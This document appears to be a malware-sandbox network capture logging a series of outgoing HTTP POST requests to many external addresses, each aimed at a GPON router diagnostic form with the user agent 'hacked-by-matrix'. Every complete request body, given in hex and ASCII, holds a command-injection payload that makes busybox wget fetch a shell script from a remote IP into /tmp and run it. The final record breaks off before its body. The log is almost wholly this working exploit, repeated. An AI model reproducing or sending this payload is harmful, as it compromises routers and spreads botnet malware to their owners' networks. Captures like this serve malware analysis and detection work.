                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.1348422118.6.121.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435734034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.13337865.232.34.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435750961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.1340260118.214.191.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435759068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.1335594118.113.107.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435780048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.134842642.179.64.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435806990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.13541125.100.15.223443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435811996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.1342404118.73.66.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435851097 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.134792042.186.245.111443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435902119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.1348866118.141.142.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435914040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.1343686212.246.182.173443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435931921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.1336238109.211.26.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435986996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.13332045.97.61.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436021090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.1349512212.248.107.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436064959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.135637642.11.56.90443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436095953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.1335598109.128.134.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436125994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.1359624118.135.229.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436125994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.1338048212.208.88.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436152935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.1349826109.146.169.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436193943 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.13541145.5.122.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436227083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.1349582118.67.241.200443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436284065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.1339484212.244.213.90443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436302900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.1334756109.95.237.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436321020 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.134532042.13.234.44443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.436364889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
